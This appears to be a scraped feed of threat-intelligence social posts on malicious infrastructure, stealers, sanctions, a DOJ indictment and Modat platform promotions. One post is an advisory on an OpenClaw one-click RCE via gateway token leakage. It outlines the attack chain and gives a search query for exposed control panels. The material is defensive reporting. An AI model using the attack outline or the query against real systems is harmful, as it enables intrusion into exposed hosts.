Calwarez

New from @RecordedFuture! @_whoisnt and I break down Threat Activity Enablers (TAEs), the often overlooked backbone of modern cyber operations. 🔗recordedfuture.com/blog/threat-ac…

OMEGATECH (AS202412) is the latest installment of Threat Activity Enabler Virtualine Technologies, following their transition away from Railnet LLC.

Huge shoutout to the team for their efforts pulling all this together! Read the full report here: recordedfuture.com/research/2025-… 6/6

Threat actors are increasingly abusing Legitimate Internet Services (LIS) like Cloudflare, Google Drive, and Telegram to hide in plain sight. It’s a structural challenge for every network defender. 5/6

🧵 ICYMI: We just dropped our 2025 Malicious Infrastructure Review! Some of the highlights below👇 #Infosec #CyberThreats 1/6

Noticed Microsoft Defender tagging #TheVoidStealer as #WallStealer thanks to some recent @abuse_ch uploads. Here’s the threat actor nikoniko (aka “TheVoidStl”) discussing the removal of multiple detections, including WallStealer.

CVE-2026-25253  ⚠️ OpenClaw (Moltbot / Clawdbot) – 1-Click RCE via Token Exfiltration  A high-severity vulnerability (CVSS 8.8) has been disclosed in OpenClaw allowing remote code execution with a single click.  The flaw is a logic issue where the Control UI blindly trusts a gatewayUrl supplied via query string and auto-connects over WebSocket, leaking the stored gateway token to attacker-controlled infrastructure.  By abusing cross-site WebSocket hijacking and privileged operator scopes, attackers can disable safety approvals, escape the container, and execute arbitrary commands directly on the host even when the gateway is bound to localhost only.   Modat previously identified exposed Clawdbot/Moltbot control panels, with numbers now even higher. You can read the full blog here modat.io/post/moltbot-u…   Fixed in: v2026.1.29 
Action: Patch immediately and rotate gateway tokens.  Modat Magnify Query: 
web.title~"Clawdbot Control" OR web.title~"OpenClaw Control" OR web.title~"Moltbot Control"  The platform: 
magnify.modat.io  #threatintel #vulnerability #CVE202625253 #OpenClaw #Moltbot #Clawdbot #RCE #AIsecurity #infosec #ModatMagnify

New Modat Magnify updates are live.  • Time-based filtering  • Unified IP detail view   • Certificate validity filtering (expired, not yet valid, abnormal lifetimes)  • CN wildcard & partial matching  • Issuer Alternative Name (IAN) search  • Empty field search with field=""  • TLS version filtering  • Banner hex search  • New Tags: VPN and PQC over SSH    Built for faster, more precise infrastructure investigations. 
  Explore the new features inside the platform:  magnify.modat.io

Use YARA for threat hunting? .@theidr0p created a tool for automated YARA rule creation based on the Cert Graveyard. Automatically checks for updates to the database and generates rules. The art is theirs. Amazing. See link in thread for details

From 2020-2024, I tracked the SolarMarker malware, and in 2024, monitored a self-infection for months to learn their actions-on-objectives: on-device fraud. I didn't publish the details of my months long investigation until now. Check the link the the attached comment.

A Ukrainian national has been federally charged with participating in dozens of cyberattacks and computer intrusions against critical infrastructure and other victims around the world, in support of Russia’s geopolitical interests, the Justice Department announced today. The two indictments against Victoria Eduardovna Dubranova, 33, a.k.a. “Vika,” a.k.a. “Tory,” a.k.a. “SovaSonya,” were unsealed today in United States District Court in Los Angeles. Dubranova was extradited to the United States earlier this year on an indictment charging her for her actions supporting CyberArmyofRussia_Reborn (CARR). Dubranova was arraigned today on a second indictment charging her for her actions supporting NoName057(16) (NoName). Dubranova has pleaded not guilty in both cases. Dubranova pleaded not guilty today at her arraignment and a February 3, 2026 trial date was scheduled in that case. As described in the indictments, the Russian government backed CARR and NoName by providing, among other things, financial support. CARR used this financial support to access various cybercriminal services, including subscriptions to distributed denial of service-for-hire services. NoName was a state-sanctioned project administered in part by an information technology organization established by order of the President of Russia in October 2018 that developed, along with other co-conspirators, NoName’s proprietary distributed denial of service (DDoS) program. Details: justice.gov/usao-cdca/pr/j…

1/ @_whoisnt and @JulianVoeg introduce #GrayBravo (formerly TAG-150) #CastleLoader #MaaS recordedfuture.com/research/grayb…

New coordinated reporting from @googlecloud, @AmnestyTech, @RecordedFuture, and @haaretzcom / @insidestory_gr, built on leaked Intellexa material and technical findings, outlines Intellexa’s exploits, corporate structure, and continued activity despite U.S. sanctions. 👇 1/

Cyber Monday Deal 
Get 6 months of Modat Magnify Pro for just €5 total (save €355).  Use code: MODAT2025CYBERMONDAY   
Try the platform. Run advanced queries. Find what others miss. 
 magnify.modat.io 
#CyberMonday #Cybersecurity #OSINT

🆕 ICYMI: The @CuratedIntel LinkedIn account is now doing weekly roundup posts based on the member’s latest content: Week 2. linkedin.com/posts/curatedi… Week 1. linkedin.com/posts/curatedi…

1/ United States, Australia, and United Kingdom sanction Russian threat activity enabler Media Land (Yalishanda) and follow up on recent designations targeting Aeza. ofac.treasury.gov/recent-actions…

1/ [UPDATE] As of November 10, 2025, metaspinner net GmbH has provided substantial evidence confirming Insikt Group’s original assessment that their identity was unlawfully and fraudulently used in the registration of #AS209800.